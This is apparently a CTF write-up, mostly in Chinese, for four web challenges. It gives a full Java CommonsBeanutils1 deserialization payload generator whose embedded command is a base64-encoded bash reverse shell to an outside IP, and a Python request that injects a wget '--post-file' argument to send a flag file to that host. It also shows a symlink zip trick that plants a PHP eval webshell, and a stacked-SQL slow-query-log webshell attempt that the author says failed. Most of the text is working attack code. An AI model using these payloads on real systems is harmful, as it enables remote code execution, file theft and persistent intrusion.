Web
Java
返回头有日志路径。然后有jar目录。直接输入jar包就有了。。。
有个路由反序列化。用CommonsBeanutils1不依赖cc的链子
package com.example.demo;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.beanutils.BeanComparator;
import org.apache.tomcat.util.codec.binary.Base64;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.PriorityQueue;
import java.util.Collections;
public class guoke {

    /**
     * CTF payload generator: builds the serialized object graph the page describes as its
     * CommonsBeanutils1-style gadget chain (no commons-collections dependency) and prints it
     * Base64-encoded. Defensive note: what makes the stream dangerous is the receiving side's
     * unfiltered {@code ObjectInputStream.readObject}; a JVM serialization filter
     * ({@code ObjectInputFilter}) that rejects unexpected classes stops the graph at read time.
     */

    /**
     * Sets a declared field on {@code object} via reflection, ignoring its access modifier.
     * Written as one helper so the field writes below read uniformly; it is used to reach
     * private fields of {@link TemplatesImpl}, {@link BeanComparator} and {@link PriorityQueue}.
     *
     * @param object    instance whose field is overwritten
     * @param fieldName name of the field; it must be declared on {@code object.getClass()} itself,
     *                  not inherited, because {@code getDeclaredField} is used
     * @param value     new field value
     * @throws Exception {@code NoSuchFieldException} or {@code IllegalAccessException} raised by
     *                   the reflection calls
     */
    public static void setFieldValue(Object object, String fieldName, Object value) throws Exception{
        Field field = object.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(object, value);
    }

    /**
     * Returns the Java-serialized bytes of the gadget chain: a {@link PriorityQueue} whose
     * comparator is a {@link BeanComparator} with property {@code "outputProperties"} and whose
     * backing array holds two {@link TemplatesImpl} instances carrying a javassist-generated class.
     *
     * @return raw serialization stream of the queue
     * @throws Exception from javassist, reflection or {@link ObjectOutputStream}
     */
    public static byte[] getPayload() throws Exception {
        // Generate the class with javassist: a subclass of AbstractTranslet whose static
        // initializer holds the author's original command string (unchanged from the page).
        ClassPool pool = ClassPool.getDefault();
        CtClass payload = pool.makeClass("EvilClass");
        payload.setSuperclass(pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"));
        // Author's note: use this initializer body instead when tracing the Shiro call chain
        // (it only prints a stack trace).
        // payload.makeClassInitializer().setBody("new java.io.IOException().printStackTrace();");
        payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"bash -c {echo,L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xLjE1LjY3LjE0Mi8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}\");");
        byte[] evilClass = payload.toBytecode();
        // Populate TemplatesImpl's private fields with the generated bytecode.
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates, "_bytecodes", new byte[][]{evilClass});
        setFieldValue(templates, "_name", "test");
        setFieldValue(templates,"_tfactory", new TransformerFactoryImpl());
        // Build the object that is serialized: a PriorityQueue ordered by a BeanComparator.
        BeanComparator beanComparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER); // change point 1
        PriorityQueue<Object> queue = new PriorityQueue<Object>(2, beanComparator);
        queue.add("1"); // change point 2
        queue.add("1");
        // Overwrite the comparator's property and the queue's backing array after the adds.
        setFieldValue(beanComparator, "property", "outputProperties");
        setFieldValue(queue, "queue", new Object[]{templates, templates});
        // Serialize (the original comment said "deserialize"; this method only writes the stream).
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);
        out.writeObject(queue);
        out.close();
        return byteArrayOutputStream.toByteArray();
    }

    /**
     * Entry point: prints the serialized payload Base64-encoded (Tomcat's codec) to stdout.
     *
     * @param args unused
     * @throws Exception propagated from {@link #getPayload()}
     */
    public static void main(String[] args) throws Exception {
        byte[] payloads = guoke.getPayload();
        System.out.println(Base64.encodeBase64String(payloads));
    }
}
wget
U1S1。去年纵横杯的题白盒到这就黑盒做了???
import base64
import re
import requests
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pksc1_v1_5
from Crypto.PublicKey import RSA
def encrpt(password, public_key):
    """RSA-encrypt ``password`` under the PEM ``public_key`` and return the ciphertext as Base64 text.

    The cipher is PKCS#1 v1.5 (per the imported module); its padding is randomized, so two
    calls with the same input yield different ciphertext.
    """
    key = RSA.importKey(public_key)
    pkcs1_cipher = Cipher_pksc1_v1_5.new(key)
    ciphertext = pkcs1_cipher.encrypt(password.encode())
    return base64.b64encode(ciphertext).decode()
# Value sent to the target's "wget" endpoint, exactly as the author pasted it. Note the
# Python escapes: ``\\n`` is the two characters backslash and n (not a newline), ``\t`` is a tab.
url="http://1.15.67.142:1337/\\n?\t--post-file=flag_is_here"
# PEM public key taken from the page; the value is encrypted with it before being posted.
public_key = '-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoFH2atPqJOH6yezxEw9seStp0j7hN3cKKlANZpAv8RRhpDxFcob47OwkyUlsJp6tdvSJBtsJ5KCNYIomdqc7+f4PJvShHatMLGBRFjUkr0aunqq9LDobEHrzwSEEX6V0V+73EdbieYxFHCz2cXaBMpnIK19c+u6sgVJFjZ+oggVyKuOtOUscnzzrMhOWGl+eXk+dBe0wjSTrq84zvRI194uTehhY/8hzZjkQavV8NWq0b7l6hJHsO7mp2tGye1npYRQ/tZCEMkzO+PaAkPf6H3CyuVgbdMJcuSBJT8kBRQ6P16skZIqrY+NRmdSJmMoGgR9NYVvk8soeSj4MHRpbrwIDAQAB\n-----END PUBLIC KEY-----'
password = encrpt(url, public_key)
# POST the encrypted value as ``encryptdata``. NOTE(review): ``res`` is assigned but never read.
res=(requests.post(url="http://192.168.40.126:1003/wget",data={"encryptdata":password}).text)
# Second, plain GET of the same endpoint; its response body is printed.
print(requests.get("http://192.168.40.126:1003/wget").text)
zipzip
# Create a symlink named guoke pointing at /var/www/html, then archive it with the link
# itself stored (-y is the short form of --symlinks) rather than the directory it points to.
ln -s /var/www/html guoke
zip -y guoke.zip guoke
上传guoke.zip
# Replace the symlink with a real directory holding a single PHP file, then archive it
# (--symlinks is the long form of -y; there are no links left to preserve at this point).
rm -rf guoke; mkdir guoke
printf '%s\n' '<?php eval($_POST[1]);?>' > guoke/guoke.php
zip --symlinks guoke1.zip guoke/*
上传guoke1.zip
ezsql
1);
set GLOBAL slow_query_log_file='/var/www/html/helpyou2findflag.php';
set GLOBAL slow_query_log=on;
setglobal long_query_time=0.000001;
elect '<?php $_REQUEST[a]($_REQUEST[b])?>';--+
听说是慢查询getshell?然而没复现成功。等WP了